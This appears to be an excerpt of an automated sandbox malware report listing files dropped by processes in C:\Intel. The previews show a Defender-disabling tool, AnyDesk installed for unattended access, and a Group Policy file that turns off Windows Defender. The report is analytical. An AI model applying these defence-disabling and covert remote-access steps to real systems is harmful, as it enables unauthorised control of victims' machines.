                                                                                                                                                                  SHA1:1F487054BD6D22A1FBD3A5AAD610B2897D389D2F
                                                                                                                                                                  SHA-256:145D1A291D7962F9C4D2A4FC0323CD1357EFB26F8030E580762DB55022D7BF84
                                                                                                                                                                  SHA-512:6E4A84D4BD2D1E52CBB197FF6E04A81C6634D03860522B13D3D8B1B4C90CAB139667AEF4ACCB41480434434F8BA247C3064C252388012A3052DCD7E7D4A98A39
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.p.%.....Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.:..qA..f.y..i9... ....VMf.i..k3.M..<..Lf....g6........F...9...A....o6.....`...|'..@....Q@...q7...bg1.Qf`... f....S7.L.....mE.....4..M...eD..& ......~&S...o9..&Sj..k6..(`...@.....g4...-...gA.M..>...o6.(...K3)..g1..fT@..e3..<ji0.....L.6...i..`.9.....0N@Y...h.9..Wb.4.........F.j.S..`....&si....../.#..Br....h...).....a2... ?..p.tQ..`..n.-.. .(....`#l...;H.@....@..m9..@.8.pL......`...S....(...'......... .......4.o7...|3Y.....2(.9..e5...|.....}M..>..`....&.I...2.`h`U...d.k..B&.......8.... .S...f.P...n...&|.V...f.`..i8.P.. .wfsP3..9 ._..t....p..mD.M........|..l.h.8..nb.|....?........ .....................`0......nh.@&.;3z..2....*.w..$..Q.&..#6.P..... .....3.......D...6..& ..%.1..&..Z..&3`........i6..f.@...@..5.......I. ..5....3`...k@k^...`" . ..`|..X..'.....k@pD..{.T.........`.T.. l_.3..I.....e...........1.a.....@4............i5..&.@...S....... ...^........O 7...AD .l... .......W........|.L.....<NAk.....`..@...f......../....(... Y.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\axvmifh

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\dc.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):111542
                                                                                                                                                                  Entropy (8bit):3.429028761339644
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:W62wUDwXu72ncwnSI6MMKWEFcwE66CpHNc+L5BLjZhvDyR4V7rS8uo:W62wUDwXNncwnSI6MMK3cmQ4HDZSJo
                                                                                                                                                                  MD5:D1A0850A8B128575034B94F0BD05318B
                                                                                                                                                                  SHA1:2064B00E81B2D0AFA60D561CCCA2D2C82D9C8414
                                                                                                                                                                  SHA-256:C40566AA7677F27F3A633FFD1A98F80FC60EB0B5B1487B756850504E5B462501
                                                                                                                                                                  SHA-512:64A1587E6E6FDB6AAC284D8C5A395385BE9605DB391C718CAF0F5F78359A8627D486C9CA6FDD1A253F0F26321FD76695B6EAC44662F87F4AC69D2873CCC679E5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:4D7573744465636C61726556617273[08AEi4755495F52554E4445464D5347[08AEi47554944617461536570617261746F7243686172[08AEi57696E44657465637448696464656E54657874[08AEi312E37[08AEi446566656E64657220436F6E74726F6C[08AEi202D20417574686F7220627920426C75654C696665[08AEi5B434C4153533A64436F6E74726F6C3A76[08AEi5D[08AEi323031352D32303231[08AEi2040557365724E616D6520[08AEi2040436F6D70696C656420[08AEi20404175746F497445786520[08AEi20404F534172636820[08AEi20404175746F497458363420[08AEi20404F5356657273696F6E20[08AEi57696E446566656E64[08AEi546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321[08AEi546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321[08AEi204053637269707444697220[08AEi204057696E646F777344697220[08AEi53797374656D33325C[08AEi2040576F726B696E6744697220[08AEi6B65726E656C33322E646C6C[08AEi7573657233322E646C6C[08AEi61647661706933322E646C6C[08AEi7368656C6C33322E646C6C[08AEi6F6C6533322E646C6C[08A

                                                                                                                                                                  C:\Users\user\AppData\Roaming\AnyDesk\ad.trace

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\svchost.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):57739
                                                                                                                                                                  Entropy (8bit):4.345467501365694
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:LaAPBLO9b6GCf1B+xptcksFblzHqnfRtnfj:OGhk+Yj
                                                                                                                                                                  MD5:27C843C8935C2F73F8006D977279FA5B
                                                                                                                                                                  SHA1:A216029C102A8D40B14B777F18F1DDDCB930F51F
                                                                                                                                                                  SHA-256:04945797C3A0563DE91B27A7B3278E2BCADC26C0FE9DA71B76DA2272CA1CA16F
                                                                                                                                                                  SHA-512:B39AF579594D37299822C509F0223C718BCA979F5830E47AC092A7C2B6F14CDC45838267E813061A78916A318A0BE092EF352B55ADFAB4CA5F661AFECF4FAF87
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: * * * * * * * * * * * * * * * * * *.. info 2025-01-11 06:54:02.818 installer 7000 2028 main - * AnyDesk Windows Startup *.. info 2025-01-11 06:54:02.818 installer 7000 2028 main - * Version 8.0.14 (release/win_8.0.14 13967ce7c71d8c19a49dd697dbd0dec1c8d166bf).. info 2025-01-11 06:54:02.818 installer 7000 2028 main - .. info 2025-01-11 06:54:02.818 installer 7000 2028 main - Command Line params: svchost.exe --install C:\Intel\AnyDesk.. info 2025-01-11 06:54:02.818 installer 7000 2028 main - Process started at 2025-01-11. PID 7000. OS is Windows 8 (64 bit).. info 2025-01-11 06:54:02.818 installer 7000 2028 impl_selector - using sse2 (intrinsics).. info 2025-01-11 06:54:02.849 installer 7000 2028 base.data.config_application - Adding GPO default

                                                                                                                                                                  C:\Users\user\AppData\Roaming\AnyDesk\service.conf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\svchost.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (1751)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                  Entropy (8bit):6.016562999293233
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:uISTBniayZw7/ooHiUGqur/sEPs/Iwj6Gt/uO/GiXttXz1OF3rsB2j57TCvsP6SU:uIST1ilZwNHi/jPSeG2O/z71OF3wB2jA
                                                                                                                                                                  MD5:97607BA03D1A9030D6FA7AAAD395BDA7
                                                                                                                                                                  SHA1:440D1A5E74FDA20944A7A41C3031C7F0BBDD73C5
                                                                                                                                                                  SHA-256:B0CF5B1CC42AE2692789646A3058711B03FA50827B3BFD201C245460086D6DFF
                                                                                                                                                                  SHA-512:49D7AB4A5526DB51CABF0A1C04AD1CCA6FADC89A165ADAD159E9CAE9EF55038506EB62E0722C18F02A4C5F550BB9ADC953A903A27B2899A646AFF2656D60EEBC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:ad.anynet.cert=-----BEGIN CERTIFICATE-----\nMIICqDCCAZACAQEwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UEAwwOQW55RGVzayBD\nbGllbnQwIBcNMjUwMTExMDY1NDA0WhgPMjA3NDEyMzAwNjU0MDRaMBkxFzAVBgNV\nBAMMDkFueURlc2sgQ2xpZW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC\nAQEAzs6638lYDHR0ZtDEfYNyAkVJzE+5oQPMFoHxDMrAdSPtJRrC1Olq0Oj3n5D1\nss1CgVkvP3pJQ4MorcgHj/IJBIdLd4X4xkTfH1/H+GMhAj+O3TqRCJhXFg2jBW7N\n7yH7/8iXoVfbpSTgqMkI2W71HQRNRSzUKKI5SYfhEB3fMvmoIeQ3lCJXIBSmmURb\ndV5tvfdwJ2f3g9DdlbsgCxz2EMyCKb80mdeEZd+OFMX0UPqyO0EmHE4cBc122NXc\n/+cb4kDLD8phZwvhYPvjqs1vAale83dX1t96ILHdwWBe1WsfUZ76jrDNXZWg8UOH\nULU7Q7NdllgLOMhDrn8SawG/pQIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQBHn5t4\nEiPskchVzlXJG9u7XI9RXiNrDx0nZRmeMEC46wL6GEydO0dep8b8pStwXdXPnqLA\n8eWH/InOlChqKFExznhhHHiDCYLb1tin6/bJ57r706AS/wkm0FuyDgqHAY5NKU41\n8NeduIECUmb18oET/QZ4z8xOCf7fSA181msccAgkSNnZxUnBhmtpjxZ0GxNwCCJV\nNjLI03UpsF5qkJmssnqq487BA+sKXiFnF6IKmJMgsePvV2YTfPvRUXquPEM1qPM0\nzCTTdPG528HMdKLn6cjOl93S/g3Yj0ylyv0kosDtDm+gPNBwSF/BxyxccdNnHflu\ntqH9slr6BBz1L6Z7\n-----END CERTI

                                                                                                                                                                  C:\Users\user\AppData\Roaming\AnyDesk\system.conf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\svchost.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):468
                                                                                                                                                                  Entropy (8bit):4.614188348356847
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:owBgpWyWyxy+iraqQAmvbahHtnoILw6QgRQUQgRQPYQgRQOYQgfxPZxi3B6QgfxL:oiqyPmqQHvWhtCroBGgFBGt
                                                                                                                                                                  MD5:847F614D0EFFC40FAF103A5BA588CFDC
                                                                                                                                                                  SHA1:C78AE555D6559D8DAEB487E223B60EC5A01A0CFF
                                                                                                                                                                  SHA-256:091CE4C2CAC292BA1F43526AF242F87B303BC772C89496D2921F5986B54DA862
                                                                                                                                                                  SHA-512:41D47FB9006B6649C3D5A236E51011170A3915113863CA53387798F716EC1BC70449EB92ED16643316C965ED187A64EF7D82039FAC75BF4392D90CCE7B29BD2C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:ad.anynet.fpr=d26194f28cdb9e152936db02d15aa168b534e57d.ad.anynet.relay.fatal_result=1.0.ad.anynet.relay.state=1.ad.inst.id=4d843a8b11bc55a386a4bafec1512d4f.ad.security.frontend_clipboard=1.ad.security.frontend_clipboard_files=1.ad.security.frontend_clipboard_version=1.ad.security.permission_profiles._default.permissions.sas=1.ad.security.permission_profiles._unattended_access.permissions.sas=1.ad.security.permission_profiles.version=1.ad.security.update_version=1.

                                                                                                                                                                  C:\Users\user\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\svchost.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (3453)
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):6408
                                                                                                                                                                  Entropy (8bit):4.358586849874255
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:4rWKt1pW+OgAq44/j1iAQylObdWNcKgnGyXE02ss:QJAq4u/QylOx4wnGVss
                                                                                                                                                                  MD5:197F0BDB9F710E53FE3C661DD5999C2A
                                                                                                                                                                  SHA1:A4633FE3D6817B1CD47F6B4CEBDF906D29454EBC
                                                                                                                                                                  SHA-256:5760080AD26E4A9AFBCD71A2E0F6ACCCC183A6066B02852190F5909C1EB9BAE1
                                                                                                                                                                  SHA-512:BBEDD500CDF64954F40782BA57901FF14D6B9BDB89236BB9C7F064E47F85B8FA69B16C92E220C13E8C329E814B70EF5414846904DF55A273FE35FCAF1E4D14E3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:ad.account.auth_methods=6fa74c609a01f31f1f670668df954f4642a4aae8018a18da2497ff19ef962effbfac453f209235070ff648310f1fa2df0b53d2e90e4e008262013ecaea92376de347806ab00f027a258e3a2dec31278ce0d19837ad8175383fe7fef432fcc27374ab0862b47b212f41cf5778b89c93b1b262c7e5f431c17b74b0ed97a125b2661ede8bf0de5fcb5c448b16ca1e265470f0d9c3d484f3d560a616a124452c2ca2f062806804e94c3a59d85dbceb1af67b5aa0e906af11451fa81dbb44b94d69ae0f92b232c3c12b26568f6e2527d4c79ef8003c8ef7348c967c19f8d20d98300521bd3cc926a0.ad.account.info=6fa74c609a01f31f1f670668df954f4642a4aae8018a18da2497ff19ef962effbfac453f209235070ff648310f1fa2df0b53d2e90e4e008262013ecaea929df07710e7cde5261fd2c90c13377f76381a95046694624fab2c0e3c95582d08c27374ab0862b47b212f41cf5778b89cb2ae4743b1dcc71310fd983fd62ad3140dda322f396b76fdeab44102beb9f8046470f0d9cc1f76353069af62c49b84d1a2b19303a56dc43e26a46806d05aebcba704064e11cc97f0e821bb868a1b58e2547c70d17a84494a1b5acb2a51e7256429eb926102b5187a981770d5738eb76510fa135d78eb7a2d6e011eb910eeab118ef748f09efc1850.ad.acc

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\75fdacd8330bac18.customDestinations-ms (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3432
                                                                                                                                                                  Entropy (8bit):3.151736712797483
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:AMd4zAzA2mQ9vZDqDfWoymQMd4zAYA/n6vZDqbjDymb:Wv2lhQDeoyBEvEQryA
                                                                                                                                                                  MD5:2D409869B1C7823970C404AABC0676AD
                                                                                                                                                                  SHA1:7850A5B1D3281C40A696329E8C80A017C41B11C7
                                                                                                                                                                  SHA-256:4B030F627D13B9086C855EEAF983BCC52BE107435036CDA4D0F78A60D6291801
                                                                                                                                                                  SHA-512:2730381F6DB703DFE822CC7186FE0795B9B5D7B6EC461F2107A22F1120E5893512F7F6B01299DD32BE462024F9879F57B200497CB806779996E143F5489AFFF6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...................................FL..................F.@.. ...z...c...K..c......c...ZQ.....................7....P.O. .:i.....+00.../C:\...................P.1.....+Z.6..Intel.<.......S.f+Z.6.....c........................I.n.t.e.l.....V.1.....+Z.6..AnyDesk.@......+Z.6+Z.6.....;......................G.A.n.y.D.e.s.k.....b.2..ZQ.+Z.6 .AnyDesk.exe.H......+Z.6+Z.6....|j........................A.n.y.D.e.s.k...e.x.e.......K...............-.......J............$......C:\Intel\AnyDesk\AnyDesk.exe....O.p.e.n. .a. .n.e.w. .A.n.y.D.e.s.k. .w.i.n.d.o.w.....C.:.\.I.n.t.e.l.\.A.n.y.D.e.s.k.\.A.n.y.D.e.s.k...e.x.e.........%SystemDrive%\Intel\AnyDesk\AnyDesk.exe.............................................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.I.n.t.e.l.\.A.n.y.D.e.s.k.\.A.n.y.D.e.s.k...e.x.e...........................................

                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TB7Q4JHKC0AEZKHH1GCV.temp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\AnyDesk\AnyDesk.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3432
                                                                                                                                                                  Entropy (8bit):3.151736712797483
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:AMd4zAzA2mQ9vZDqDfWoymQMd4zAYA/n6vZDqbjDymb:Wv2lhQDeoyBEvEQryA
                                                                                                                                                                  MD5:2D409869B1C7823970C404AABC0676AD
                                                                                                                                                                  SHA1:7850A5B1D3281C40A696329E8C80A017C41B11C7
                                                                                                                                                                  SHA-256:4B030F627D13B9086C855EEAF983BCC52BE107435036CDA4D0F78A60D6291801
                                                                                                                                                                  SHA-512:2730381F6DB703DFE822CC7186FE0795B9B5D7B6EC461F2107A22F1120E5893512F7F6B01299DD32BE462024F9879F57B200497CB806779996E143F5489AFFF6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...................................FL..................F.@.. ...z...c...K..c......c...ZQ.....................7....P.O. .:i.....+00.../C:\...................P.1.....+Z.6..Intel.<.......S.f+Z.6.....c........................I.n.t.e.l.....V.1.....+Z.6..AnyDesk.@......+Z.6+Z.6.....;......................G.A.n.y.D.e.s.k.....b.2..ZQ.+Z.6 .AnyDesk.exe.H......+Z.6+Z.6....|j........................A.n.y.D.e.s.k...e.x.e.......K...............-.......J............$......C:\Intel\AnyDesk\AnyDesk.exe....O.p.e.n. .a. .n.e.w. .A.n.y.D.e.s.k. .w.i.n.d.o.w.....C.:.\.I.n.t.e.l.\.A.n.y.D.e.s.k.\.A.n.y.D.e.s.k...e.x.e.........%SystemDrive%\Intel\AnyDesk\AnyDesk.exe.............................................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.I.n.t.e.l.\.A.n.y.D.e.s.k.\.A.n.y.D.e.s.k...e.x.e...........................................

                                                                                                                                                                  C:\Windows\System32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\dc.exe
                                                                                                                                                                  File Type:RAGE Package Format (RPF),
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):160
                                                                                                                                                                  Entropy (8bit):3.218156819855109
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:CFlE3A5l1QTal7BcNylRjlyWdl+SliFlhakDBu8hfe1l3W0UJlAll+ll6zll6slG:CFlEESOllcHWn+SkUkDk8hfe18U+/6ze
                                                                                                                                                                  MD5:58F8EB09A822C09FC11F5A42BAAE36F1
                                                                                                                                                                  SHA1:9E7063EEEE62C8588E0020BEF3A116E9379966AA
                                                                                                                                                                  SHA-256:6509C7FC4FA70391399831BBC3D66206D3F6F8F2BB20FFCAC4E04844861D733A
                                                                                                                                                                  SHA-512:53806780934BD86BB032EE4A515DFC0E8464A5ECC5F4C8C593304FCD969C1058D443BDEC54E7AE21469ADB942B16693CC9EAF997217ADC69D3618AB0EC99DC1E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:PReg....[.S.o.f.t.w.a.r.e.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].

                                                                                                                                                                  C:\Windows\System32\GroupPolicy\gpt.ini

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\dc.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):267
                                                                                                                                                                  Entropy (8bit):4.830707279954051
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:1WsMzYHxbnnXO/GGG/Rn5Rnn3R0MzYHxbnn/JIAuNhUHdhJgN:1q0HxbnXOMB1d0Hxbn/JnumuN
                                                                                                                                                                  MD5:CD9A20D6270A6D99C19CEBFE937339E6
                                                                                                                                                                  SHA1:27D7783117CCA63F5274756909E3DC6C43985079
                                                                                                                                                                  SHA-256:2D1BBF666E3DBF853D45D60EB2B0E3033BACF59A5FFDE99D3CF5B642ED19E51E
                                                                                                                                                                  SHA-512:53F4CB2206FFB25339ED467206A6D542357049098B27901CECFF5814018341EA500DE3A5B40BBA4FFEF73E0008C73CBC075A1114D86903B432373C8AEC408210
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:[General]..gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{00000000-0000-0000-0000-000000000000}{D02B1F72-3407-48AE-BA88-E8213C6761F1}]..Version=3..gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}]..

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\3c2ef124-1048-4984-9f26-ddfeb12ce27d.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3441
                                                                                                                                                                  Entropy (8bit):5.25119335378785
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:BUGkffrzdXH58rh/cI9URoDotohQwmvAxXve4mhJu:G7QeoDUCXB
                                                                                                                                                                  MD5:A3F8E89871E85CE22BDF7F5D9F16E184
                                                                                                                                                                  SHA1:CBC52D4C0C091524506EBBE5ED5A198355EE7B40
                                                                                                                                                                  SHA-256:D769FCDFF7BC11D8A6ACCA1FE26C756B9673C42C6BFB1FDD59726C6A62498866
                                                                                                                                                                  SHA-512:BE0797B01716CAA03B2BC571610FB3E44F8CFB9B3ECB3EBDD2CFB1690D554EDEBDCA9E73CFD2B4EB1FF468CF90213CCB6C0E4C4BA2B5B4B248BCE20A4A9BDF96
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAA2onF6G1EeQY3BWQJxxWnlEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAMmSaSDLMl2ilMZ5cJoyMlNmScsQ5OsudNoE/18DiLYYAAAAADoAAAAACAAAgAAAATZ6UmnaZy++zgp+t3TFXMSN1TFQQxl3ZwEZWMMQBmuQwAAAAoELchcTtgpOFUoy4eul5WuLR63wJEuwEcJcuTQXVbH5y7VsOMq6FE0XckxKvvPDIQAAAAJLfogvHEVPFOa//1PTZN64wL34LfIVgnTTjZc2QcmMhjj1l6U8iKdo7AVTuAtiMMa0JQbYfczMBkOC6L+iP1gU="},"policy":{"last_statistics_update":"1338

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\5a797d07-8d5b-4e7c-92af-7a3fbfcef4b2.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11575
                                                                                                                                                                  Entropy (8bit):5.57042766004104
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:uhoCL/Pgu90RZj8Sr6FA4ZiIxuERzA83h09RZxAexumNstoDU9o66XXgZJZK8Hiy:q9iIxuERzA83h09RZxD5gyXgZrK8GCn
                                                                                                                                                                  MD5:DDA51D75EDF661CB248ABCDAC41DAEC6
                                                                                                                                                                  SHA1:D71AC47F7B517FB503FBFEB2BE9DF469EB54C460
                                                                                                                                                                  SHA-256:B53331AF70A91E0C4C890A33CF2433DEA06368AF7111F809D826D0B8143A77C7
                                                                                                                                                                  SHA-512:686DDEB43AEDEC0AC35A354EE6AD6413BF56FD42252062465906762E02A9D5C07F9DB22CBFE7C41D5A6DDDCBA703CEE4986359BC73F4CE5F454E4CBD25F9632A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"94.0.992.31","browser_version_of_last_seen_whats_new":"94.0.992.31","last_redirect_origin":"","last_seen_whats_new_page_version":"94.0.992.31","last_whats_new_version":94},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExpo

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\5c07473f-281c-45cb-bea7-aab2092a1778.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2202
                                                                                                                                                                  Entropy (8bit):5.305743169749667
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YnOBhmo05ffPHDiiP1XKsV5lXUZPsvBi/vRVe4WnhJa:BjMffrzdXHr0EvAxVe4mhJa
                                                                                                                                                                  MD5:8D538FD656183C7004CFB4E8689D5583
                                                                                                                                                                  SHA1:E511FA3B1EC7CA0C2BA429C7CF74D3FB93F0C384
                                                                                                                                                                  SHA-256:2EDDEDA7255A6FEAE71B749337548CF3BE25C213EF9B8AB6597F6004F23543C4
                                                                                                                                                                  SHA-512:A87D2DE8133BF54AA5073DB8B1622B7D03D5F52D93615950C49E736BEEAC02E21DB785A4FF8270633445B6BA9EFBBFE7E1A84230AC30B2E09A222A9738188539
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAA2onF6G1EeQY3BWQJxxWnlEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAMmSaSDLMl2ilMZ5cJoyMlNmScsQ5OsudNoE/18DiLYYAAAAADoAAAAACAAAgAAAATZ6UmnaZy++zgp+t3TFXMSN1TFQQxl3ZwEZWMMQBmuQwAAAAoELchcTtgpOFUoy4eul5WuLR63wJEuwEcJcuTQXVbH5y7VsOMq6FE0XckxKvvPDIQAAAAJLfogvHEVPFOa//1PTZN64wL34LfIVgnTTjZc2QcmMhjj1l6U8iKdo7AVTuAtiMMa0JQbYfczMBkOC6L+iP1gU="},"policy":{"last_statistics_update":"13381052064408370"},"profile":{"info_cache":{},"profile_counts_reported":"13381052064141985"},"profile_network_context_service":{"http_cache_finch_experiment_groups":"None None None"},"profiles":{"edge":{"implicit_signin":{"telemetry

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\74831cd8-25de-47b8-b66a-86261e4ffdf1.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11497
                                                                                                                                                                  Entropy (8bit):5.574012959274108
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:uhoCL/Pgu90RZj8Sr6FA4ZiIxuERzA83h09RZxAexumNptoDU9o66XXgZJZK8Hiy:q9iIxuERzA83h09RZxDqgyXgZrK8GCn
                                                                                                                                                                  MD5:8724A29DDC4A79406825AFF15A1E0D1A
                                                                                                                                                                  SHA1:5E18FA2C4F14DA7377837E385CA4C3D3C6C17029
                                                                                                                                                                  SHA-256:184B0384909E8D9741C514B202C2A5C5BAFB6756B714A8866C5254086F6C017B
                                                                                                                                                                  SHA-512:350D7A64D4F080984BFEA9DDB57B35C93DB75B6E13F7E582AA0939F17B50609B995496A8A2245264458ACF10DE6BA7A798812E6918329E29B700A41F2190794B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"94.0.992.31","browser_version_of_last_seen_whats_new":"94.0.992.31","last_redirect_origin":"","last_seen_whats_new_page_version":"94.0.992.31","last_whats_new_version":94},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExpo

                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\4c8cad45-196d-4217-b0ab-447e9c6b9df0.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                  Entropy (8bit):4.640155433808841
                                                                                                                                                                  Encrypted:false
